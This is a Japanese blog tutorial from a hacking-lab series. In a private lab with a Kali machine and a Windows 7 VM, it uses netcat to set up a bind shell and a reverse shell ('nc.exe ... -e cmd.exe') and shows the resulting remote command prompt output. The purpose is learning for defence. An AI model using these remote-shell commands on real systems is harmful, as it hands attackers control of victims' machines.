5
5

More than 5 years have passed since last update.

ハック技術: Windows7ハック #2 バックドアの仕組み(リバースシェル)編

Last updated at Posted at 2019-05-03

#ゆるいハッキング大会」に参加した。
ハッキング熱が高まった。

ハッキング・ラボのつくりかた」を勢いで購入。

今回は、ハッキング・ラボの作り方に載っているWindows7のやり方の、バックドアの仕組みについて。

お約束

本記事は、
・防御の為に敵の攻撃を知る
・技術力向上
を目的としている為、記載内容を悪用する事は禁じます。
記載内容を実行した結果として生じた全ての事に、私は一切責任を負いません。

環境について

0.自分のノートPC

 HP HP Spectre x360 Convertible 13-ac0XX/827E, BIOS F.31 04/27/2017
 Linux dsnote 4.15.0-48-generic #51~16.04.1-Ubuntu SMP Fri Apr 5 12:01:12 UTC 2019 x86_64 GNU/Linux

1. KaliLinux

ハック技術: KaliLinux on Docker - Qiita

2. Windows7(攻撃対象)

ハック技術: Windows7ハック #1 Vagrant VirtualBoxで環境セットアップ編 (on Ubuntu) - Qiita

バックドア

侵入を容易にする裏口。毎回対象を攻略する必要がなくなる。

Netcatでシェル

http://netcat.sourceforge.net/
https://joncraton.org/blog/46/netcat-for-windows/

ダウンロード、解凍(pass: nc)、実行(ポート5555で接続待ち)。

> nc.exe -lvp 5555

WindowsFirewallが通信許可するか聞いてくるので、両方チェックして許可する。

別プロンプトで、netstat実行。

C:\Users\IEUser>netstat -an

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:22             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5555           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49163          0.0.0.0:0              LISTENING
  TCP    10.0.2.15:139          0.0.0.0:0              LISTENING
  TCP    [::]:22                [::]:0                 LISTENING
  TCP    [::]:135               [::]:0                 LISTENING
  TCP    [::]:445               [::]:0                 LISTENING
  TCP    [::]:49152             [::]:0                 LISTENING
  TCP    [::]:49153             [::]:0                 LISTENING
  TCP    [::]:49154             [::]:0                 LISTENING
  TCP    [::]:49155             [::]:0                 LISTENING
  TCP    [::]:49163             [::]:0                 LISTENING
  UDP    0.0.0.0:5355           *:*
  UDP    10.0.2.15:137          *:*
  UDP    10.0.2.15:138          *:*
  UDP    10.0.2.15:1900         *:*
  UDP    127.0.0.1:1900         *:*
  UDP    127.0.0.1:57898        *:*
  UDP    [::]:5355              *:*
  UDP    [::1]:1900             *:*
  UDP    [::1]:57897            *:*
  UDP    [fe80::256b:4013:4140:453f%15]:1900  *:*

5555でlisten中。

# nc -v 10.0.2.15 5555

接続が完了すると、

C:\Users\IEUser\Desktop\nc111nt>nc.exe -lvp 5555
listening on [any] 5555 ...
172.28.128.1: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [172.28.128.3] from (UNKNOWN) [172.28.128.1] 49938: NO_DATA

こうなる。
kali側で、何か文字を打ってエンター押すと、Win7側でもその文字が出力される。

バインドシェル

攻撃端末からターゲット端末に接続するタイプのシェルをバインドシェルという。

> nc.exe -lvp 5555 -e cmd.exe

-eオプションは、ヘルプを見ると、

  -e prog         inbound program to exec [dangerous!!]

と書いてある。
ターゲットがLinuxだと、-e /bin/bashを指定。
Kaliからwinへ接続すると、Winのシェルを操作可能。

root@dsnote:~# nc 172.28.128.3 5555
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\IEUser\Desktop\nc111nt>

C:\Users\IEUser\Desktop\nc111nt>dir
dir
 Volume in drive C is Windows 7
 Volume Serial Number is D055-099C

 Directory of C:\Users\IEUser\Desktop\nc111nt

05/03/2019  02:06 AM    <DIR>          .
05/03/2019  02:06 AM    <DIR>          ..
05/03/2019  02:06 AM            12,166 doexec.c
05/03/2019  02:06 AM             7,283 generic.h
05/03/2019  02:06 AM            22,784 getopt.c
05/03/2019  02:06 AM             4,765 getopt.h
05/03/2019  02:06 AM            61,780 hobbit.txt
05/03/2019  02:06 AM            18,009 license.txt
05/03/2019  02:06 AM               544 makefile
05/03/2019  02:06 AM            61,440 nc.exe
05/03/2019  02:06 AM            69,662 netcat.c
05/03/2019  02:06 AM                 0 password is nc
05/03/2019  02:06 AM             6,833 readme.txt
              11 File(s)        265,266 bytes
               2 Dir(s)  29,751,881,728 bytes free

C:\Users\IEUser\Desktop\nc111nt>whoami
whoami
ie11win7\ieuser

C:\Users\IEUser\Desktop\nc111nt>

しかし、この方法だと通信路のFirewallやルーターなどでブロックされる可能性大。
Firewallの設定では、インバウンドの設定で弾かれる。

リバースシェル

ターゲット端末から攻撃端末に対して接続する。

Kali側で接続を待ち受ける。

root@dsnote:~# nc -lvp 5555
listening on [any] 5555 ...

Win側から、Kaliに接続する。

C:\Users\IEUser\Desktop\nc111nt>nc.exe 172.28.128.1 5555 -e cmd.exe

すると、Kali側でWinのコマンドプロンプトが表示される。

172.28.128.3: inverse host lookup failed: Unknown host
connect to [172.28.128.1] from (UNKNOWN) [172.28.128.3] 49344
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\IEUser\Desktop\nc111nt>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection 2:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::256b:4013:4140:453f%15
   IPv4 Address. . . . . . . . . . . : 172.28.128.3
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 

Tunnel adapter isatap.{53152A2F-39F7-458E-BD58-24D17099256A}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

C:\Users\IEUser\Desktop\nc111nt>exit

おわり

次は、Metasploitを使ってWin7を遠隔操作する。

5
5
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
5
5